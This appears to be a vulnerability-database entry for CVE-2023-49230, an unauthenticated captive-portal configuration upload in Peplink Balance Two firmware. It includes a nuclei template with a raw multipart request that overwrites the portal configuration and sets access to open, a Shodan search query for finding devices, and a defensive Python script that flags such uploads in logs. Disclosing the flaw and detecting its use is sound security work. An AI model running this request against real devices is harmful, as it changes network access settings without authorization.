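Peplink Balance Two Unauthenticated Configuration Upload Vulnerability

Vulnerability Information

Vulnerability name: Peplink Balance Two Unauthenticated Configuration Upload Vulnerability

Vulnerability ID:

  • CVE: CVE-2023-49230

Vulnerability type: Unauthorized access

Severity: High

Description: Peplink Balance Two is a widely used network load-balancing device for enterprise network environments, providing efficient traffic management and network optimization. It is deployed across many industries, particularly where high availability and network performance optimization are required. A vulnerability in versions prior to 8.4.0 allows an unauthenticated attacker to modify the captive portal configuration. The root cause is that the /guest/portal_admin_upload.cgi endpoint lacks a proper authorization check: an attacker can upload files through this endpoint and modify the configuration, and the changes are reflected at /guest/preview.cgi?portal_id=1. This unauthorized access may let an attacker modify network configuration, which may in turn lead to service disruption, data leakage or other security risks. Because the attack requires no authentication and can be carried out remotely, the security risk is high and the flaw may be exploited by automated tools.

Vendor: peplink

Product: balance_two_firmware

Affected versions: version < 8.4.0

Search query: html:"PEPLINK"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/37785df0460b7141ce4315082d161a53ad108cfa/http%2Fcves%2F2023%2FCVE-2023-49230.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details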


```yaml
id: CVE-2023-49230

info:
  name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
  reference:
    - https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4
    - https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-49230
    cwe-id: CWE-862
    epss-score: 0.00091
    epss-percentile: 0.27
    cpe: cpe:2.3:o:peplink:balance_two_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: peplink
    product: balance_two_firmware
    shodan-query: html:"PEPLINK"
  tags: cve,cve2023,peplink,intrusive,file-upload

flow: http(1) && http(2) && http(3)
variables:
  button_value: "{{randstr}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/MANGA/index.cgi"

    matchers:
      - type: word
        part: body
        words:
          - 'Peplink'
        internal: true

  - raw:
      - |
        POST /guest/portal_admin_upload.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="option"

        edit_page
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="mode"

        submit
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="portal_id"

        1
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="data"

        {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"{{button_value}}","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo_action"

        x
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo"; filename=""
        Content-Type: application/octet-stream

        -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        words:
          - '"status": "save_success"'
        internal: true

  - raw:
      - |
        POST /guest/api.cgi HTTP/1.1
        Host: {{Hostname}}

        mode=info&option=preview&portal_id=1

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{button_value}}')"
          - "status_code == 200"
        condition: and
```
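
A defender-side check for the behaviour described above, as an added example that is not part of the original page or the nuclei template: it scans web access logs for accepted POSTs to /guest/portal_admin_upload.cgi from outside an admin subnet and records whether the same client then read the portal back. The combined log format (for example from a proxy or sensor in front of the device), the admin subnet, the 60-second window and the sample lines are assumptions.

```python
import ipaddress
import re
from datetime import datetime, timedelta

UPLOAD_PATH = "/guest/portal_admin_upload.cgi"             # endpoint named on this page
READBACK_PATHS = ("/guest/preview.cgi", "/guest/api.cgi")  # where the change shows up
ADMIN_NETS = [ipaddress.ip_network("10.0.50.0/24")]        # assumption: admin subnet
WINDOW = timedelta(seconds=60)                             # assumption: correlation window
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    """Parse one combined-log-format line; return None if it is malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    try:
        ip = ipaddress.ip_address(m["ip"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return {"ip": ip, "ts": ts, "method": m["method"],
            "path": m["path"].split("?", 1)[0], "status": int(m["status"])}

def find_suspect_uploads(lines):
    """Return (client, time, read_back) for accepted uploads from non-admin hosts."""
    events = [e for e in map(parse, lines) if e]
    findings = []
    for i, e in enumerate(events):
        if (e["method"], e["path"], e["status"]) != ("POST", UPLOAD_PATH, 200):
            continue  # not an accepted upload to the portal endpoint
        if any(e["ip"] in net for net in ADMIN_NETS):
            continue  # expected source: administrator workstation
        read_back = any(n["ip"] == e["ip"] and n["path"] in READBACK_PATHS
                        and timedelta(0) <= n["ts"] - e["ts"] <= WINDOW
                        for n in events[i + 1:])
        findings.append((str(e["ip"]), e["ts"].isoformat(), read_back))
    return findings

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jul/2025:09:14:03 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [11/Jul/2025:09:14:04 +0000] "GET /guest/preview.cgi?portal_id=1 HTTP/1.1" 200 912 "-" "-"',
    '10.0.50.12 - - [11/Jul/2025:10:02:41 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 200 31 "-" "-"',
    '198.51.100.23 - - [11/Jul/2025:11:30:00 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 200 31 "-" "-"',
    '192.0.2.44 - - [11/Jul/2025:12:00:00 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 403 0 "-" "-"',
]

if __name__ == "__main__":
    print(find_suspect_uploads(SAMPLE_LOG))
```

A finding with `read_back` set to true matches the upload-then-preview sequence; on firmware 8.4.0 or later, unauthenticated uploads should no longer be accepted, so any finding on such a device deserves a closer look.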



Author: lianccc
Published: July 11, 2025